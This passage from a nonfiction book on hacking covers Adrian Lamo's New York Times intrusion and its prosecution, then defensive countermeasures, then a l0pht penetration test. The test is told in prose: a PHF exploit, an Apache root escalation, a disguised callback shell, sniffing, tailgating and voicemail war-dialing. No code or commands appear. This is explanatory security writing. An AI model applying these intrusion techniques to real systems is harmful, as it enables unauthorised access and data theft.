was not just harmless but funny. I still chuckle at the idea of Adrian get-
ting a phone call: “Hello, Mr. Lamo? This is so-and-so from the New York
Times.” And then he’s quoted in a piece, or maybe even asked to write
600 words on the state of computer security or some such topic that runs
the next day on the op-ed page of the country’s most influential paper.
   There’s more to the saga of Adrian and the New York Times; the rest of
it isn’t funny. It wasn’t necessary, it wasn’t characteristic of Adrian, and it
led him into serious trouble. After tampering with the op-ed page data-
base listings, he discovered that he had access to the Times’ subscription
to LexisNexis, an online service that charges users for access to legal and
news information.
   He allegedly set up five separate accounts and conducted a very large
number of searches — over 3,000, according to the government.
   After three months of browsing through LexisNexis with the New York
Times totally unaware that its accounts have been hijacked, Adrian finally
reverted to the Robin Hood behavior that had characterized his previous
attacks on other companies. He got in touch with a well-known Internet
journalist (like me a former hacker) and explained the vulnerability he had
exploited that gave him access to the New York Times computer system —
but only after extracting an agreement that the reporter would not pub-
lish any information about the break-in until he had first advised the
Times and waited until they had fixed the problem.
   The reporter told me that when he contacted the Times, the conversa-
tion didn’t go quite the way either he or Adrian had expected. The Times,
he said, wasn’t interested in what he had to tell them, didn’t want any of
the information he offered, had no interest in speaking directly to Adrian
to find out the details, and would take care of it on its own. The Times
person didn’t even want to know what the method of access had been,
finally agreeing to write down the details only after the reporter insisted.
                      Chapter 5   The Robin Hood Hacker                  105

  The newspaper verified the vulnerability and within 48 hours had the
gap sewn up, Adrian says. But Times’ executives were not exactly appre-
ciative of having the security problem called to their attention. The earlier
Hacking for Girlies attack had received a lot of press, and their embar-
rassment was no doubt made all the worse because the people responsible
were never caught. (And don’t think that I had any connection with the
attack; at the time, I was in detention awaiting trial.) It’s a safe guess that
their IT people had been put under a lot of pressure to make sure they
would never again be the victim of a hacker break-in. So Adrian’s explo-
ration around their computer network may have wounded some egos and
damaged some reputations, which would explain the newspaper’s
uncompromising attitude when it learned he had been taking advantage
of their unintended generosity for months.
  Maybe the Times would have been willing to show appreciation for
being allowed time to plug the gaping hole in its computer system before
the story of its wide-open network appeared in print. Maybe it was only
when they discovered the LexisNexis usage that they decided to get hard-
nosed. Whatever the reason, the Times authorities took the step that none
of Adrian’s previous victims had ever taken: They called the FBI.
  Several months later, Adrian heard the FBI was looking for him and
disappeared. The Feds started visiting family, friends, and associates —
tightening the screws and trying to find out whether he had let any of his
journalist contacts know where he was hanging out. The ill-conceived
plan resulted in attempts to subpoena notes from several reporters Adrian
had shared information with. “The game,” one journalist wrote, “had
suddenly turned serious.”
  Adrian gave himself up after only five days. For the surrender, he chose
one of his favorite places to explore from: a Starbucks.
  When the dust had settled, a press release put out by the office of the
United States Attorney for the Southern District of New York stated that
the “the charges incurred” by Adrian’s New York Times hack “was [sic]
approximately $300,000.” His freeloading, according to the govern-
ment, amounted to 18 percent of all LexisNexis searches performed from
New York Times accounts during his romp on their site.2
  The government had apparently based this calculation on what the
charge would be for you or me — or anyone else who is not a LexisNexis
subscriber — to do individual, pay-as-you-go searches, a fee that is scaled
up to as much as $12 for a single query. Even calculated that highly unrea-
sonable way, Adrian would have had to do something like 270 searches
every day for three months to reach a total figure that high. And since large
organizations like the Times pay a monthly fee for unlimited LexisNexis
access, it’s likely they never paid a penny additional for Adrian’s searches.
106                           The Art of Intrusion


  According to Adrian, the New York Times episode was an exception in
his hacking career. He says he had received thanks from both
Excite@Home and MCI WorldCom (which was all the more grateful after
they confirmed that he could indeed have had hundreds of employee
direct-deposit transfers paid to some account under his control). Adrian
sounds not bitter but merely matter-of-fact when he says that “The New
York Times was the only one that wanted to see me prosecuted.”
  To make matters worse for him, the government had apparently some-
how induced several of Adrian’s earlier victims to file statements of dam-
ages suffered — even including some companies that had thanked him
for the information he provided. But maybe that’s not surprising: A
request for cooperation from the FBI or a federal prosecutor is not some-
thing most companies would choose to ignore, even if they had thought
differently about the matter up to that time.


The Unique Nature of Adrian’s Skills
Highly untypical of a hacker, Adrian is not fluent in any programming
language. His success instead relies on analyzing how people think, how
they set up systems, the processes that are used by system and network
administrators to do network architecture. Though he describes himself
as having poor short-term memory, he discovers vulnerabilities by prob-
ing a company’s Web applications to find access to its network, then
trolling the network, patiently building up a mental diagram of how the
pieces relate until he manages to “materialize” in some corner of the net-
work that the company thought was hidden in the dark recesses of inac-
cessibility and therefore safe from attack.
  His own description crosses the border into the unexpected:

      I believe there are commonalities to any complex system, be it a
      computer or the universe. We ourselves encompass these common-
      alities as individual facets of the system. If you can get a subcon-
      scious sense of those patterns, sometimes they work in your favor,
      bring you to strange places.
      [Hacking] has always been for me less about technology and more
      about religion.

  Adrian knows that if he deliberately sets out to compromise a specific char-
acteristic of a system, the effort will most likely fail. By allowing himself to
wander, guided mainly by intuition, he ends up where he wants to be.
  Adrian doesn’t believe his approach is particularly unique, but he
acknowledges never having met any other hacker who was successful in
this way.
                      Chapter 5   The Robin Hood Hacker                     107

     One of the reasons none of these companies, spending thousands
     and thousands of dollars on detection, has ever detected me is that
     I don’t do what a normal intruder does. When I spot a network
     system open to compromise, I view it the way it’s supposed to be
     done. I think, “Okay, employees access customer information. If I
     were an employee, what would I ask [the system] to do?” It’s hard
     [for the system] to distinguish legitimate from illegitimate activ-
     ity because you’re going through the same interface an employee
     would. It’s essentially the same traffic.

  Once Adrian has the network’s layout in his head, “it’s less about looking
at numbers on a screen and more a sense of actually being in there, spotting
patterns. It’s a way of seeing, a view on reality. I can’t define it, but I see it
in my head. I notice what lives where, how it interrelates and connects. And
many times this leads me to what some people consider amazing.”
  During an interview with NBC Nightly News at a Kinko’s in
Washington, DC, the crew jokingly challenged Adrian to try breaking
into NBC’s system. He says that with cameras rolling, he had confiden-
tial data on the screen in under five minutes.3
  Adrian tries to approach a system both as an employee and an outsider
would. He believes the dichotomy tells his intuition where to go next.
He’ll even role-play, pretending to himself that he’s an employee out to
complete a specific assignment, thinking and moving forward in the
appropriate way. It works so well for him that people long ago stopped
dismissing his uncanny success as chance fumblings in the dark.


Easy Information
One night at the same Starbucks where I had once had coffee with him,
Adrian got an earful. He was sitting there with a cup of coffee when a car
pulled up and five men piled out. They sat down at a nearby table, and
he listened to their conversation; it quickly becomes apparent that they
were law enforcement and he was pretty sure they were FBI.

     They talked shop for about an hour, entirely oblivious to the fact
     that I’m sitting there not touching my coffee. They’re talking shop
     talk — who was liked, who was disliked.
     They made agent jokes about how you could tell the power of an
     agency by the size of the badge it issued. FBI agents wear very
     small badges, whereas like the Fish & Game Department issues
     huge badges. So the power is in reversed proportion. They thought
     that was funny.
108                          The Art of Intrusion


  On their way out, the agents gave Adrian a cursory look, as if just real-
izing the young man staring into a cold cup of coffee might have heard
things he shouldn’t have.
  Another time Adrian was able with a single phone call to find out crit-
ical information about AOL. While their IT systems are well-protected,
he says he exposed a serious vulnerability when he called the company
that manufactures and lays their fiber optic cable. Adrian claims he was
given all the cyber maps showing where AOL’s main and backup cables
were buried. “They just assumed that if you knew to call them, you must
be okay to talk to.” A hacker out to cause trouble could have cost AOL
millions of dollars in downtime and repairs.
  That’s pretty scary. Adrian and I agree; it’s mind-blowing the way peo-
ple are so loose with information.


These Days
In the summer of 2004, Adrian Lamo was sentenced to six months home
confinement and two years of supervised release. The Court also ordered
him to pay $65,000 in restitution to his victims.4 Based on Adrian’s earn-
ing potential and his lack of funds (he was homeless at the time, for God’s
sake), this amount of restitution is plainly punitive. In setting a figure for
restitution, the court must consider a number of factors, including the
defendant’s present and future ability to pay, and the actual losses suf-
fered by his victims. An order of restitution is not supposed to be puni-
tive. In my opinion, the judge did not really consider Adrian’s ability to
pay such a large amount but probably instead set the amount as a way of
sending a message, since Adrian’s case has been so much in the news.
  Meanwhile he’s rehabilitating himself and turning his life around on his
own. He’s taking journalism classes at a community college in
Sacramento; he’s also writing articles for a local newspaper and beginning
to do a bit of freelancing.

      To me, journalism is the best career I could choose, while remain-
      ing true to what makes me tick — curiosity, wanting to see things
      differently, wanting to know more about the world around me.
      The same motives as hacking.

  Adrian is, I hope, being honest with himself and with me when he talks
about his awareness of a new course in life.

      I’d be lying if I said I thought people could change overnight. I
      can’t stop being curious overnight, but I can take my curiosity
      and apply it in a way that doesn’t hurt people. Because if there’s
                     Chapter 5   The Robin Hood Hacker                       109

     one thing I’ve taken from this process, it’s an awareness that there
     are real people behind networks. I really can’t look at a computer
     intrusion and not think about the people who have to stay up
     nights worrying about it any more.
     I think journalism and photography for me are intellectual sur-
     rogates for crime. They let me exercise my curiosity, they let me see
     things differently, they let me pursue tangents in a way that’s
     law-abiding.

  He has also talked his way into a freelance assignment for Network
World. They had contacted him, wanting to use him as the source for a
story; he pitched them the idea that instead of doing a sidebar interview
with him, they’d let him write the sidebar. The magazine editor agreed.
So accompanying a piece profiling hackers was a piece by him on profil-
ing network administrators.

     Journalism is what I want to do. I feel like I can make a differ-
     ence, and that’s not something you get a lot of from working in
     security. Security is an industry that very prevalently relies on
     people’s fears and uncertainties about computers and technology.
     Journalism is far more about the truth.
     Hacking is a unique ego issue. It involves the potential for a great
     deal of power in the hands of a single individual, power reserved
     for government or big business. The idea of some teenager being
     able to turn off the power grid scares the hell out of government.
     It should.

  He doesn’t consider himself a hacker, cracker, or network intruder. “If
I can quote Bob Dylan, ‘I’m no preacher or traveling salesman. I just do
what I do.’ It makes me happy when people understand or want to
understand that.”
  Adrian says he has been offered lucrative jobs with the military and a
federal government agency. He turned them down. “A lot of people
enjoy sex, but not everyone wants to do it for a living.”
  That’s Adrian the purist ... the thinking man’s hacker.


INSIGHT
Whatever you think about Adrian Lamo’s attitude and actions, I’d like to
think you will agree with me about the way the federal prosecutors cal-
culated the cost of the “damage” he caused.
110                         The Art of Intrusion


  I know from personal experience how prosecutors build up the sup-
posed price tag in hacker cases. One strategy is to obtain statements from
companies that overstate their losses in hopes of forcing the hacker to
plead out rather than going to trial. The defense attorney and the prose-
cutor then haggle over agreeing on some lesser figure as the loss that will
be presented to the judge; under federal guidelines, the greater the loss,
the longer the sentence.
  In Adrian’s case, the U.S. Attorney chose to ignore the fact that the
companies learned they were vulnerable to attack because Adrian himself
told them so. Each time, he protected the companies by advising them of
the gaping holes in their systems and waiting until they had fixed the
problems before he permitted news of his break-in to be published. Sure
he had violated the law, but he had (at least in my book) acted ethically.


COUNTERMEASURES
The approach used by attackers, and favored by Adrian, of running a Whois
query can reveal a number of pieces of valuable information, available from
the four network information centers (NICs) covering different geographic
regions of the world. Most of the information in these databases is public,
available to anyone who uses a Whois utility or goes to a Web site that
offers the service, and enters a domain name such as nytimes.com.
  The information provided may include the name, e-mail address, physi-
cal address, and phone number of the administrative and technical contacts
for the domain. This information could be used for social engineering
attacks (see Chapter 10, “Social Engineers — How They Work and How
to Stop Them”). In addition, it may give a clue about the pattern for e-mail
addresses and login names used by the company. For example, if an
e-mail address showed as, say, hilda@nytimes.com, this could suggest the
possibility that not just this one employee but perhaps quite a number of
Times staff members might be using just their first name for e-mail address,
and possibly also for sign-on.
  As explained in the story of Adrian’s New York Times attack, he also
received valuable information about the IP addresses and netblocks
assigned to the newspaper company, which were a cornerstone of his suc-
cessful attack.
  To limit information leakage, one valuable step for any company would
be to list phone numbers only for the company switchboard, rather than
for specific individuals. Telephone receptionists should undergo intensive
training so they can quickly recognize when someone is trying to pry
information out of them. Also, the mailing address listed should be the
published address of the corporate headquarters, not the address of par-
ticular facilities.
                     Chapter 5   The Robin Hood Hacker                 111

  Even better: Companies are now permitted to keep private the domain
name contact information — it no longer has to be listed as information
available to anyone who inquires. On request, your company’s listing will
be obscured, making this approach more difficult for attackers.
  One other valuable tip was mentioned in the story: setting up a split-
horizon DNS. This involves establishing an internal DNS server to
resolve hostnames on the internal network, while setting up another
DNS server externally that contains the records for hosts that are used by
the public.
  In another method of reconnaissance, a hacker will query authoritative
Domain Name Servers to learn the type and operating system platform
of corporate computers, and information for mapping out the target’s
entire domain. This information is very useful in coordinating a further
attack. The DNS database may include Host Information (HINFO)
records, leaking this information. Network administrators should avoid
publishing HINFO records in any publicly accessible DNS server.
  Another hacker trick makes use of an operation called a zone transfer.
(Although unsuccessful, Adrian says he attempted this method in his
attacks on both the New York Times and Excite@Home.) For protection
of data, a primary DNS server is usually configured to allow other
authoritative servers permission to copy DNS records for a particular
domain. If the primary server hasn’t been configured properly, an
attacker can initiate a zone transfer to any computer he or she designates,
and in this way readily obtain detailed information on all the named hosts
and their associated IP addresses of the domain.
  The procedure for protecting against this type of attack involves only
allowing zone transfers between trusted systems as necessary for business
operations. To be more specific, the DNS primary server should be con-
figured to allow transfers only to your trusted secondary DNS server.
  Additionally, a default firewall rule should be used to block access to
TCP port 53 on any corporate name servers. And another firewall rule
can be defined to allow trusted secondary name servers to connect to
TCP port 53 and initiate zone transfers.
  Companies should make it difficult for an attacker to use the reverse
DNS lookup technique. While it is convenient to use hostnames that
make it clear what the host is being used for — names such as database.
CompanyX.com — it’s obvious that this also makes it easier for an
intruder to spot systems worth targeting.
  Other information-gathering DNS reverse lookup techniques include
dictionary and brute-force attacks. For example, if the target domain is kev-
inmitnick.com, a dictionary attack will prefix every word in the dictionary
to the domain name in the form of dictionaryword.kevinmitnick.com, to
112                         The Art of Intrusion


identify other hosts within that domain. A brute-force reverse DNS
attack is much more complex, where the prefix is a series of alphanumeric
characters that are incremented a character at a time to cycle through
every possibility. To block this method, the corporate DNS server can be
configured to eliminate publishing DNS records of any internal host-
names. And an external DNS server can be used in addition to the inter-
nal one, so that internal hostnames are not leaked to any untrusted
network. In addition, the use of separate internal and external name
servers also helps with the issue mentioned previously concerning host-
names: An internal DNS server, protected from visibility from outside the
firewall, can use hostnames with identifying hostnames such as database,
research, and backup with little risk.
   Adrian was able to gain valuable information about the New York Times
network by examining the header of an e-mail received from the newspa-
per, which revealed an internal IP address. Hackers intentionally bounce
e-mail messages to obtain this kind of information, or scour public news-
groups looking for e-mail messages that are similarly revealing. The header
information can provide a wealth of information, including the naming
conventions used internally, internal IP addresses, and the route an e-mail
message has taken. To protect against this, companies should configure
their SMTP (Simple Mail Transfer Protocol) server to filter out any inter-
nal IP addresses or host information from outgoing mail messages, pre-
venting internal identifiers from being exposed to the public.
   Adrian’s primary weapon was his intellectual gift of finding misconfig-
ured proxy servers. Recall that one use of a proxy server is to allow users
on the trusted side of the computer network to access Internet resources
on the untrusted side. The user on the inside makes a request for a par-
ticular Web page; the request is sent to the proxy server, which forwards
the request on behalf of the user and passes the response back to the user.
   To prevent hackers from obtaining information the way Adrian does,
proxy servers should be configured to listen only on the internal inter-
face. Or, instead, they may be configured to listen only to an authorized
list of trusted outside IP addresses. That way, no unauthorized outside
user can even connect. A common mistake is setting up proxy servers that
listen on all network interfaces, including the external interface con-
nected to the Internet. Instead, the proxy server should be configured to
allow only a special set of IP addresses that have been set aside by the
Internet Assigned Numbers Authority (IANA) for private networks.
There are three blocks of private IP addresses:

  10.0.0.0 through 10.255.255.255
  172.16.0.0 through 172.31.255.255
  192.168.0.0 through 192.168.255.255
                          Chapter 5     The Robin Hood Hacker                     113

   It’s also a good idea to use port restriction to limit the specific services
the proxy server will allow, such as limiting any outgoing connections to
HTTP (Web access) or HTTPS (secure Web access). For further control,
some proxy servers using SSL (Secure Sockets Layer) may be configured
to examine the initial stages of the traffic being sent to confirm that an
unauthorized protocol is not being tunneled over an authorized port.
Taking these steps will curtail an attacker from misusing the proxy server
to connect to unauthorized services.
   After installing and configuring a proxy server, it should be tested for
vulnerabilities. You never know if you’re vulnerable until you test for secu-
rity failures. A free proxy checker can be downloaded from the Internet.5
   One other item: Since a user installing a software package may in some
circumstances unknowingly be also installing proxy server software, cor-
porate security practices should provide some procedure for routinely
checking computers for unauthorized proxy servers that may have been
installed inadvertently. You can use Adrian’s favorite tool, Proxy Hunter,
to test your own network. Remember that a misconfigured proxy server
can be a hacker’s best friend.
   A great many hacker attacks can be blocked simply by following best
security practices and exercising a standard of due care. But the dangers of
accidentally deploying an open proxy are too often overlooked and repre-
sent a major vulnerability in a great number of organizations. Enough said?


THE BOTTOM LINE
In whatever field you find them, people of an original turn of mind, peo-
ple who are deep thinkers and see the world (or at least parts of it) more
clearly than those around them are people worth encouraging.
  And, for those like Adrian Lamo, people worth steering along a con-
structive path. Adrian has the ability to make significant contributions. I
will follow his progress with fascination.


NOTES
1. See the press release from the U.S. Government at www.usdoj.gov/criminal/cybercrime/
lamoCharge.htm.
2. See www.usdoj.gov/criminal/cybercrime/lamoCharge.htm.
3. For more information on this, see www.crime-research.org/library/Kevin2.htm.
4. See www.infoworld.com/article/04/07/16/HNlamohome_1.html.
5. For more information on this, see www.corpit.ru/mjt/proxycheck.html.
             Chapter 6
           The Wisdom and Folly
           of Penetration Testing
The adage is true that the security systems have to win every time, the
attacker only has to win once.
                                                        — Dustin Dykes




T
           hink of a prison warden who hires an expert to study his insti-
           tution’s security procedures, concerned about any gaps that
           could allow an inmate to slip out. A company follows that same
line of thinking when it brings in a security firm to test the sanctity of its
Web site and computer networks against intrusion by seeing whether
hired attackers can find a way to access sensitive data, enter restricted
parts of the office space, or otherwise find gaps in the security that could
put the company at risk.
   To people in the security field, these are penetration tests — or, in the
lingo, “pen tests.” The security firms that conduct these drills are fre-
quently staffed by (surprise, surprise) former hackers. In fact, the founders
of these firms are themselves frequently people who have extensive hacker
credentials that they prefer their clients never find out about. It makes
sense that security professionals tend to come from the hacker community,
since a typical hacker is well educated in the common and not so common
doorways that companies inadvertently leave open into their inner sanc-
tums. Many of these former hackers have known since they were teens
that “security” is, in a great many cases, a serious misnomer.
   Any company that orders a pen test and expects the results to confirm
that their security is intact and flawless is likely setting themselves up for

                                    115
116                          The Art of Intrusion


a rude awakening. Professionals in the business of conducting security
assessments frequently find the same old mistakes — companies are sim-
ply not exercising enough diligence in protecting their proprietary infor-
mation and computer systems.
  The reason businesses and government agencies conduct security assess-
ments is to identify their security posture at a point in time. Moreover,
they could measure progress after remediating any vulnerabilities that
were identified. Granted, a penetration test is analogous to an EKG.
The next day, a hacker can break in using a zero-day exploit, even though
the business or agency passed their security assessment with flying colors.
  So, calling for a pen test in the expectation that it will confirm the
organization is doing a bang-up job of protecting its sensitive informa-
tion is folly. The results are likely to prove exactly the opposite, as demon-
strated by the following stories — one for a consulting company, the
other with a biotech firm.


ONE COLD WINTER
Not long ago, several managers and executives of a large New England
IT consulting firm gathered in their lobby conference room to meet with
a pair of consultants. I can imagine the company technology people at the
table must have been curious about one of the consultants, Pieter Zatko,
an ex-hacker widely known as “Mudge.”
  Back in the early 1990s, Mudge and an associate brought together an
assortment of like-minded guys to work together in cramped space in a
Boston warehouse; the group would become a highly respected com-
puter security outfit called l0pht or, tongue firmly in cheek, l0pht Heavy
Industries. (The name is spelled with a small “L,” a zero instead of an
“o,” and, in hacker style, “ph” for the sound of “f”; it’s pronounced
“loft.”) As the operation grew more successful and his reputation spread,
Mudge was invited to share his knowledge. He has lectured at places like
the U.S. Army’s strategy school in Monterey on the subject of “informa-
tion warfare” — how to get into an enemy’s computers and disrupt serv-
ices without being detected, as well as on data destruction techniques and
the like.
  One of the most popular tools for computer hackers (and sometimes for
security people as well) is the software package called l0phtCrack. The
magic this program performs is taken for granted by those who use it, and
I suspect thoroughly hated by a great many others. The l0pht group gar-
nered media attention because they wrote a tool (called 10phtCrack) that
quickly cracked password hashes. Mudge coauthored l0phtCrack and
cofounded the online site that made the program available to hackers and
anybody else interested, at first free, later as a moneymaking operation.
            Chapter 6   The Wisdom and Folly of Penetration Testing         117


Initial Meeting
The call that L0pht had received from the consulting firm (we’ll call
them “Newton”) came after the firm decided they needed to expand the
services they offered their clients by adding the capability to conduct pen
tests. Instead of hiring new staff people and building a department grad-
ually, they were shopping for an existing organization they could buy and
bring in-house. At the start of the meeting, one of the company people
laid the idea on the table: “We want to buy you and make you part of our
company.” Mudge remembers the reaction:

     We were like, “Well, er, um, you don’t even know much about us.”
     We knew they were really interested largely from the media frenzy
     that l0phtCrack was creating.

  Partly to buy time while he got used to the idea of selling the company,
partly because he didn’t want to rush into negotiations, Mudge came up
with a delaying tactic.

     I said, “Look, you don’t really know what you’d be getting. How
     about this — how about for $15,000 we will do an exhaustive pen
     test on your organization?”
     At the time, the l0pht wasn’t even a pen test company. But I told
     them, “You don’t know what our skills are, you’re basically going
     off of our publicity. You’ll pay us $15,000. If you don’t like what
     you get, then you don’t have to buy us and it will still have been
     worth the time because you’ll get a good pen test report and we’ll
     have $15,000 in the bank.
     “And, of course, if you like it and you’re impressed by it, which we
     expect you will, then you’ll buy us.”
     They said, “Sure, this is great.”
     And I’m thinking, “What idiots!”

  To Mudge’s way of thinking, they were “idiots” because they were
going to authorize the l0pht team to break into their files and corre-
spondence at the same time they were negotiating a deal to buy his com-
pany. He fully expected to be able to peer over their shoulders.


Ground Rules
Security consultants running a pen test have something in common with
the undercover vice cops buying drugs: If some uniformed precinct cop
spots the transaction and pulls his gun, the vice squad guy just shows his
118                          The Art of Intrusion


badge. No worries about going to jail. The security consultant hired to
test the defenses of a company wants the same protection. Instead of a
badge, each member of the pen-test team gets a letter signed by a com-
pany executive saying, in effect, “This guy has been hired to do a project
for us, and if you catch him doing something that looks improper, it’s
okay. No sweat. Let him go about his work and send me a message with
the details.”
   In the security community, this letter is known by all as a “get-out-of-
jail-free card.” Pen testers tend to be very conscientious about making
sure they always have a copy of the letter with them when they’re on or
anywhere near the premises of the client company, in case they get
stopped by a security guard who decides to flex some muscle and impress
the higher-ups with his gumshoe instincts, or challenged by a conscien-
tious employee who spots something suspicious and has enough gump-
tion to confront the pen tester.
   In another standard step before a test is launched, the client specifies the
ground rules — what parts of their operation they want included in the test
and what parts are off-limits. Is this just a technical attack, to see if the
testers can obtain sensitive information by finding unprotected systems or
getting past the firewall? Is it an application assessment of the publicly fac-
ing Web site only, or the internal computer network, or the whole works?
Will social engineering attacks be included — attempting to dupe employ-
ees into giving out unauthorized information? How about physical attacks,
in which the testers attempt to infiltrate the building, circumventing the
guard force or slipping in through employee-only entrances? And how
about trying to obtain information by dumpster diving — looking through
the company trash for discarded paperwork with passwords or other data
of value? All this needs to be spelled out in advance.
   Often the company wants only a limited test. One member of the l0pht
group, Carlos, sees this as unrealistic, pointing out that “hackers don’t
work that way.” He favors a more aggressive approach, one where the
gloves are off and there are no restrictions. This kind of test is not only
more revealing and valuable for the client but more pleasing to the testers
as well. It is, Carlos says, “a lot more fun and interesting.” On this one,
Carlos got his wish: Newton agreed to a no-holds-barred attack.
   Security is primarily based on trust. The hiring firm must trust the secu-
rity company entrusted to perform the security assessment. Furthermore,
most businesses and government agencies require a nondisclosure agree-
ment (NDA) to legally protect proprietary business information from
unauthorized disclosure.
   It’s common for pen testers to sign an NDA, since they may come
upon sensitive information. (Of course, the NDA seems almost superflu-
ous: Any company that made use of any client information would likely
            Chapter 6   The Wisdom and Folly of Penetration Testing      119

never manage to get another client. Discretion is essentially a prerequisite.)
Frequently, pen testers are also required to sign a rider stating that the firm
will do its best not to impact the company’s daily business operations.
  The l0pht crew for the Newton test consisted of seven individuals, who
would work alone or in pairs, each person or team responsible for focus-
ing on a different aspect of the company’s operations.


Attack!
With their get-out-of-jail-free cards, the l0pht team members could be as
aggressive as they wanted, even “noisy” — meaning carrying out activities
that could call attention to themselves, something a pen tester usually
avoids. But they still hoped to remain invisible. “It’s cooler to get all this
information and then at the end know they hadn’t detected you. You’re
always trying for that,” says Carlos.
   Newton’s Web server was running the popular server software called
Apache. The first vulnerability that Mudge had found was the target com-
pany’s Checkpoint Firewall-1 had a hidden default configuration (rule) to
allow in packets with a source UDP (User Data Protocol) or TCP
(Transmission Control Protocol) port of 53 to almost all the high ports
above 1023. His first thought was to attempt to mount off their exported
file systems using NFS (Network File System), but quickly realized that
the firewall had a rule blocking access to NFS daemon (port 2049).
   Although the common system services were blocked, Mudge knew of
an undocumented feature of the Solaris operating system that bound
rpcbind (the portmapper) to a port above 32770. The portmapper
assigns dynamic port numbers for certain programs. Through the
portmapper, he was able to find the dynamic port that was assigned to
the mount daemon (mountd) service. Depending on the format of the
request, Mudge says, “the mount daemon will also field Network File
System requests because it uses the same code. I got the mount daemon
from the portmapper, then I went up to the mount daemon with my
NFS request.” Using a program called nfsshell, he was able to remotely
mount the target system’s file system. Mudge said, “We quickly got the
dial-up list numbers. We just download their entire exported file systems.
We had total control of the system.”
   Mudge also found that target server was vulnerable to the ubiquitous
PHF hole (see Chapter 2, “When Terrorists Come Calling”). He was able
to trick the PHF CGI script to execute arbitrary commands by passing the
Unicode string for a newline character followed by the shell command to
run. Looking around the system using PHF, he realized that the Apache
server process was running under the “nobody” account. Mudge was
pleased to see that the systems administrators had “locked down the
120                           The Art of Intrusion


box” — that is, secured the computer system — which is exactly what
should be done if the server is connected to an untrusted network like
the Internet. He searched for files and directories, hoping to find one
that was writable. Upon further examination, he noticed that the Apache
configuration file (httpd.conf) was also owned by the “nobody” account.
This mistake meant that he had the ability to overwrite the contents of the
httpd.conf file.
  His strategy was to change the Apache configuration file so the next
time Apache was restarted, the server would run with the privileges of the
root account. But he needed a way to edit the configuration so he could
change what user Apache would run under.
  Working together with a man whose handle is Hobbit, the two figured
out a way to use the netcat program, along with a few shell tricks, to get
the closest thing to an interactive shell. Because the system administrator
had apparently changed the ownership of the files in the “conf”directory
to “nobody,” Mudge was able to use the “sed” command to edit
httpd.conf, so the next time Apache was started, it would run as root.
(This vulnerability in the then-current version of Apache has since been
corrected.)
  Because his changes would not go into effect until the next Apache was
restarted, he had to sit back and wait. Once the server rebooted, Mudge
was able to execute commands as the root through the same PHF vul-
nerability; while those commands had previously been executed under
the context of the “nobody” account, now Apache was running as root.
With the ability to execute commands as root, it was easy to gain full con-
trol of the system.
  Meanwhile, the l0pht attacks were progressing on other fronts. What
most of us in hacking and security call dumpster diving, Mudge has a
more formal term for it: physical analysis.

      We sent people over to do physical analysis. One employee [of the
      client company] I guess had recently been fired and instead of just
      throwing out his paperwork, they had trashed his entire desk. [Our
      guys found] his desk set out with the trash. The drawers were full of
      old airline tickets, manuals, and all kinds of internal documents.
      I wanted to show [the client] that good security practices are not
      just about computer security.
      This was a lot easier than going through all their trash stuff
      because they had a compactor. But they couldn’t fit the desk in the
      compactor.
      I still have that desk somewhere.
            Chapter 6   The Wisdom and Folly of Penetration Testing        121

   The physical team also entered the company premises using a simple
and, in the right circumstances, nearly infallible method known as tail-
gating. This involves following closely behind an employee as he or she
goes through a secured door, and it works especially well coming out of
a company cafeteria or other area mostly used by employees, into a
secured area. Most staff members, particularly lower-ranked ones, hesi-
tate to confront a stranger who enters the building right behind them,
for fear the person might be someone of rank in the company.
   Another l0pht team was conducting attacks on the company’s telephone
and voicemail systems. The standard starting point is to figure out the man-
ufacturer and type of the system the client is using, then set a computer to
war dialing — that is, trying one extension after another to locate employ-
ees who have never set their own passwords, or have used passwords that
are easy to guess. Once they find a vulnerable phone, the attackers can then
listen to any stored voicemail messages. (Phone hackers — “phreakers” —
have used the same method to place outgoing calls at the expense of the
company.)
   While war dialing, the l0pht telephone team was also identifying company
phone extensions answered by a dial-up modem. These dial-up connections
are sometimes left unprotected, relying on the security-through-obscurity
approach, and are frequently on “the trusted side” of the firewall.


Blackout
The days were rolling by, the teams were recording valuable tidbits of infor-
mation, but Mudge still hadn’t come up with a brilliant idea about causing
the Apache system to reboot so that he could gain access to the network.
Then a misfortune occurred that, for the team, had a silver lining:

     I was listening to the news and heard there was a blackout in the
     city where the company was located.
     It actually was tragic because a utility worker had died in a
     manhole explosion across on the other side of town, but it had
     knocked out power for the whole town.
     I thought, if they just take long enough to restore the power, then
     the server’s power backup system most likely will run out.

 That would mean the server would shut down. When the city power
was restored, the system would reboot.

     I sat there checking the Web server constantly and then at some
     point the system went down. They had to reboot it. So the timing
122                        The Art of Intrusion


      was perfect for us. When the system came up, lo and behold
      Apache was running as root, just as we planned.

  The l0pht team at that point was able to completely compromise the
machine, which then became “our internal stepping stone to scan an
attack out from that point.” To Carlos, this was “a field day.”
  The team developed a piece of code that would make it unlikely they
could be shut out of the system. Corporate firewalls are not usually con-
figured to block outgoing traffic, and Mudge’s lightweight program,
installed on one of Newton’s server, made a connection every few min-
utes back to a computer under the team’s control. This connection pro-
vided a command-line interface like the “command-line shell” familiar to
users of Unix, Linux, and the old DOS operating system. In other words,
the Newton machine was regularly providing Mudge’s team the oppor-
tunity to enter commands that bypassed the company’s firewall.
  To avoid detection, Mudge had named their script to blend into the
system’s background language. Anyone spotting the file would assume it
was a part of the normal working environment.
  Carlos set about searching the Oracle databases in hopes of finding the
employee payroll data. “If you can show the CIO his salary and how
much bonus he was paid, that usually drives the message home that
you’ve got everything.” Mudge set up a sniffer on all email going in and
out of the company. Whenever a Newton employee went to the firewall
for maintenance work, l0pht was aware of it. They were shocked to see
that clear text was being used to log in on the firewall.
  In just a short time, l0pht had fully penetrated the entire network, and
had the data to prove it. Says Mudge, “You know, that’s why I think a lot
of companies don’t like to have pen tests of the inside of their networks.
They know it’s all bad.”


Voicemail Revelations
The telephone team discovered that some of the executives leading the
negotiations to acquire the l0pht had default passwords on their voicemail
boxes. Mudge and his teammates got an earful — and some of it was funny.
  One of the items they had requested as a condition of selling l0pht to
the company was a mobile operations unit — a cargo van they could
equip with wireless gear and use during other penetration tests for cap-
turing unencrypted wireless communications. To one of the executives,
the idea of buying a van for the l0pht team seemed so outrageous that he
started calling it a Winnebago. His voicemail was full of scathing remarks
from other company officials about the “Winnebago,” and the l0pht
team in general. Mudge was both amused and appalled.
           Chapter 6   The Wisdom and Folly of Penetration Testing          123


Final Report
When the test period was over, Mudge and the team wrote up their
report and prepared to deliver it at a meeting to be attended by all the
executives of Newton. The Newton people had no idea what to expect;
the l0pht crew knew it would be an incendiary session.

     So we’re giving them the report and we’re just ripping them open.
     And they’re embarrassed. This wonderful systems administrator, a
     really nice guy, but we had sniffers in place, and we had watched
     him trying to log onto one of the routers, trying a password and it
